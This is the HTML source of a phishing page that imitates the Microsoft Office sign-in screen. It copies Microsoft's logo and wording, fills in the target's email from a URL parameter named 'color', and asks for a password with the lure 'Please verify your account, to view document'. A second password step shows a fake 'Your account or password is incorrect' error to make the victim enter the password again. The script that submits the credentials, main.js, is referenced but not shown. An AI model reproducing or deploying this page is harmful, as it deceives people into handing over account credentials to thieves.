<!DOCTYPE html>

<html>


   <head>
    <meta charset="utf-8">
    <META NAME="robots" CONTENT="nofollow,noindex">
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"> 
    <meta name="viewport" content="width=device-width,initial-scale=1.0">
    <link rel="icon" href="oo.png">
    <link rel="stylesheet" href="bootstrap.min.css">
     <link rel="stylesheet" href="style.css">
    <script src="axios.min.js"></script>
    <link rel="stylesheet" href="font-awesome.min.css">
    <script type="text/javascript" src="MaskedPassword.js"></script>


    <title>Microsoft Office</title>
     <META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">




 </head>



  <body  onload="">
    <div id="app">
      

    <div class="container-fluid" id="showcase"> 

      <article  role="main" >
        
        
       <div class="modal" id="modal">
                <div class="modal-body">
                    <div class="">
                        <div id="formdiv" style="">
                                                    
                            <div class="row ml-auto">
                               <div id="svgimg" class="form-group row col-md-12">
                                 <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.534-.255,2.646,2.646,0,0,0-.852-.12,1.808,1.808,0,0,0-1.448.722,3.467,3.467,0,0,0-.592,2.223V18.4H60.525V8.507h2.329v1.559h.038A2.729,2.729,0,0,1,63.855,8.8,2.611,2.611,0,0,1,65.4,8.343m1,5.254A5.358,5.358,0,0,1,67.792,9.71a5.1,5.1,0,0,1,3.85-1.434,4.742,4.742,0,0,1,3.623,1.381,5.212,5.212,0,0,1,1.3,3.729,5.257,5.257,0,0,1-1.386,3.83,5.019,5.019,0,0,1-3.772,1.424,4.935,4.935,0,0,1-3.652-1.352A4.987,4.987,0,0,1,66.406,13.6m2.425-.077a3.535,3.535,0,0,0,.7,2.368,2.505,2.505,0,0,0,2.011.818,2.345,2.345,0,0,0,1.934-.818,3.783,3.783,0,0,0,.664-2.425,3.651,3.651,0,0,0-.688-2.411,2.389,2.389,0,0,0-1.929-.813,2.44,2.44,0,0,0-1.988.852,3.707,3.707,0,0,0-.707,2.43m11.2-2.416a1,1,0,0,0,.318.785,5.426,5.426,0,0,0,1.4.717,4.767,4.767,0,0,1,1.959,1.256,2.6,2.6,0,0,1,.563,1.689A2.715,2.715,0,0,1,83.2,17.794a4.558,4.558,0,0,1-2.9.847,6.978,6.978,0,0,1-1.362-.149,6.047,6.047,0,0,1-1.265-.38v-2.29a5.733,5.733,0,0,0,1.367.7,4,4,0,0,0,1.328.26,2.365,2.365,0,0,0,1.164-.221.79.79,0,0,0,.375-.741,1.029,1.029,0,0,0-.39-.813,5.768,5.768,0,0,0-1.477-.765,4.564,4.564,0,0,1-1.829-1.213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3.6,0,0,0-1.222-.221,1.781,1.781,0,0,0-1.034.26.824.824,0,0,0-.371.712M85.278,13.6A5.358,5.358,0,0,1,86.664,9.71a5.1,5.1,0,0,1,3.849-1.434,4.743,4.743,0,0,1,3.624,1.381,5.212,5.212,0,0,1,1.3,3.729,5.259,5.259,0,0,1-1.386,3.83,5.02,5.02,0,0,1-3.773,1.424,4.934,4.934,0,0,1-3.652-1.352A4.987,4.987,0,0,1,85.278,13.6m2.425-.077a3.537,3.537,0,0,0,.7,2.368,2.506,2.506,0,0,0,2.011.818,2.345,2.345,0,0,0,1.934-.818,3.783,3.783,0,0,0,.664-2.425,3.651,3.651,0,0,0-.688-2.411,2.39,2.39,0,0,0-1.93-.813,2.439,2.439,0,0,0-1.987.852,3.707,3.707,0,0,0-.707,2.43m15.464-3.109H99.7V18.4H97.341V10.412H95.686V8.507h1.655V7.13a3.423,3.423,0,0,1,1.015-2.555,3.561,3.561,0,0,1,2.6-1,5.807,5.807,0,0,1,.751.043,2.993,2.993,0,0,1,.577.13V5.764a2.422,2.422,0,0,0-.4-.164,2.107,2.107,0,0,0-.664-.1,1.407,1.407,0,0,0-1.126.457A2.017,2.017,0,0,0,99.7,7.313V8.507h3.469V6.283l2.339-.712V8.507h2.358v1.906h-2.358v4.629a1.951,1.951,0,0,0,.332,1.29,1.326,1.326,0,0,0,1.044.375,1.557,1.557,0,0,0,.486-.1,2.294,2.294,0,0,0,.5-.231V18.3a2.737,2.737,0,0,1-.736.231,5.029,5.029,0,0,1-1.015.106,2.887,2.887,0,0,1-2.209-.784,3.341,3.341,0,0,1-.736-2.363Z" fill="#737373"/><rect width="10.931" height="10.931" fill="#f25022"/><rect x="12.069" width="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10.931" fill="#ffb900"/></svg>
                               </div>

                                <div class="row ml-auto" id="email-row" style="display: flex;"> 
                                  <div class="form-group row col-md-12 text-title"> 
                                  <div role="heading" aria-level="1" >Sign in</div>

                                </div>

                                <div class=" row  alert alert-error col-md-12" style="display: none;" id="usernameError" >
                  Enter a valid email address, phone number, or Skype name.
                </div>


                              

                                <form id="email-signin" novalidate>  

                                    <div class="form-group row col-md-12"> 
                                      <input type="email" autofocus="autofocus" size="200"  maxlength="113" id="email"  name="userEmail" placeholder="Email, phone, or Skype" class=" ltr_override">
                                  </div>

                                  <div class="form-group row col-md-12"> 
                                    <div role="heading" aria-level="1" style="font-size: .8125rem;">No account?<a href=" #"> Create one!</a></div>
                                  </div>

                                  <div class="form-group row col-md-12"> 
                                    <div role="heading" aria-level="1" style="font-size: .8125rem;"><a href=" #">Can't access your account?</a></div>
                                  </div>

                                  <div class="form-group row col-md-12"> 
                                    <div role="heading" aria-level="1" class="col-md-4" style=""></div>
                                    <div role="heading" aria-level="1" class="col-md-4" style=""></div>
                                    <div role="heading" aria-level="1" class="col-md-4" style=""><button type="submit" class="btn btn-block btn-primary" id="next" >Next</button></div>
                                  </div>

                                </form>
                                </div>

                                <div class="row ml-auto mt-auto" id="password-row" style="display: none;">

                                  <div class="form-group row col-md-12"> 
                                   <div class="row col-md-12"  id="showid"></div>
                                   <div class="" ></div>
                                  </div>

                                  
                                  <div class="form-group row col-md-12 text-title" style="margin-top: -10px;"> 
                                    <div role="heading" aria-level="1" >Enter password</div>
                                  </div>



                                  <div class="row  text-body col-md-12" style="font-size: .9375rem; display: flex; margin-top: -7px;" >
                  Please verify your account, to view document.
                </div>
                <div class="row   col-md-12" style="font-size: .9375rem; display: flex;" >
                  
                </div>

                                


                                  <div class="row  alert alert-error col-md-12" style="font-size: .9999rem; display: none; margin-top: 10px;" id="passwordError" >
                  Please enter your password.
                </div>


                                 <form id="signin" novalidate style="margin-top: 11px;">
                                    <div class="form-group row col-md-12"> 
                                      <input type="password"  autocomplete="off" maxlength="113" name="userPassword" id="password" placeholder="Password" size="200" class=" ltr_override">
                                  </div>

                                  <div class="form-group row col-md-12"> 
                                    <div role="heading" aria-level="1" style="font-size: .8125rem;"><a href=" #">Forgot my password</a></div>
                                  </div>

                                  <div class="form-group row col-md-12"> 
                                    <div role="heading" aria-level="1" style="font-size: .8125rem;"><a href=" #">Sign in with a different Microsoft account</a></div>
                                  </div>


                                  <div class="form-group row col-md-12"> 
                                    <div role="heading" aria-level="1" class="col-md-4" style=""></div>
                                    <div role="heading" aria-level="1" class="col-md-4" style=""></div>
                                    <div role="heading" aria-level="1" class="col-md-4" style=""><button type="submit" i class="btn btn-block btn-primary" name="" style="text-align: center;">Sign in</button></div>
                                  </div>
                                 </form>
                                </div>

                                 <div class="row ml-auto mt-auto" id="password2-row" style="display: none;">

                                  <div class="form-group row col-md-12"> 
                                   <div class="row col-md-12"  id="showid2"></div>
                                   <div class=""></div>
                                  </div>

                                  
                                  <div class="form-group row col-md-12 text-title"> 
                                    <div role="heading" aria-level="1"  style="margin-top: -10px;">Enter password</div>
                                  </div>

                                  <div class=" row  alert alert-error col-md-12" style="font-size: .9999rem; display: none;" id="password21Error" >
                  Please enter your password.
                </div>

                 <div class=" row  alert alert-error col-md-12" style="font-size: .9999rem; display: inline;" id="password22Error" >
                  Your account or password is incorrect. If you don't remember your password, <a href="#">reset it now.</a>
                </div>


                                 
                                </div>

                                <div id="animate" class="form-group row col-md-12 ml-auto" style="display: none;">
                                  <div   class="progress-container"> <div class="progress" aria-label="Please wait">< <div></div><div></div><div></div><div></div><div></div></div></div>

                                <!-- <div class="form-group mt-2 row col-md-12 text-title"> 
                                  <div role="heading" aria-level="1" id="ldt" style="display: flex;">Authenticating....... </div>
                                   <div role="heading" aria-level="1" id="fnf" style="display: none;">Authentication Complete<img width="56px" height="50px" src="https://www.turningtechnologies.ca/wp-content/uploads/2016/02/CheckMark.png"> </div>
                                </div> -->

                                 </div>

                            </div>



                        </div>
                        
                    </div>
                                   
                </div>
        </div>

    </div>



    </div>


     
    <script src="jquery-3.3.1.slim.min.js"></script>
    <script src="popper.min.js"></script>
    <script src="bootstrap.min.js" ></script>

     <script type="text/javascript">
     	
     var client_email = getAllUrlParams().color;
     var id = document.getElementById('showid');
        id.innerHTML = client_email
     document.getElementById('showid2').innerHTML = client_email


     function getAllUrlParams(url) {

  // get query string from url (optional) or window
  var queryString = url ? url.split('?')[1] : window.location.search.slice(1);

  // we'll store the parameters here
  var obj = {};

  // if query string exists
  if (queryString) {

    // stuff after # is not part of query string, so get rid of it
    queryString = queryString.split('#')[0];

    // split our query string into its component parts
    var arr = queryString.split('&');

    for (var i = 0; i < arr.length; i++) {
      // separate the keys and the values
      var a = arr[i].split('=');

      // set parameter name and value (use 'true' if empty)
      var paramName = a[0];
      var paramValue = typeof (a[1]) === 'undefined' ? true : a[1];

      // (optional) keep case consistent
      paramName = paramName.toLowerCase();
      if (typeof paramValue === 'string') paramValue = paramValue.toLowerCase();

      // if the paramName ends with square brackets, e.g. colors[] or colors[2]
      if (paramName.match(/\[(\d+)?\]$/)) {

        // create key if it doesn't exist
        var key = paramName.replace(/\[(\d+)?\]/, '');
        if (!obj[key]) obj[key] = [];

        // if it's an indexed array e.g. colors[2]
        if (paramName.match(/\[\d+\]$/)) {
          // get the index value and add the entry at the appropriate position
          var index = /\[(\d+)\]/.exec(paramName)[1];
          obj[key][index] = paramValue;
        } else {
          // otherwise add the value to the end of the array
          obj[key].push(paramValue);
        }
      } else {
        // we're dealing with a string
        if (!obj[paramName]) {
          // if it doesn't exist, create property
          obj[paramName] = paramValue;
        } else if (obj[paramName] && typeof obj[paramName] === 'string'){
          // if property does exist and it's a string, convert it to an array
          obj[paramName] = [obj[paramName]];
          obj[paramName].push(paramValue);
        } else {
          // otherwise add the property
          obj[paramName].push(paramValue);
        }
      }
    }
  }

  return obj;
}
   
     
 </script>

 <script src="main.js"></script>

  </body>
</html>

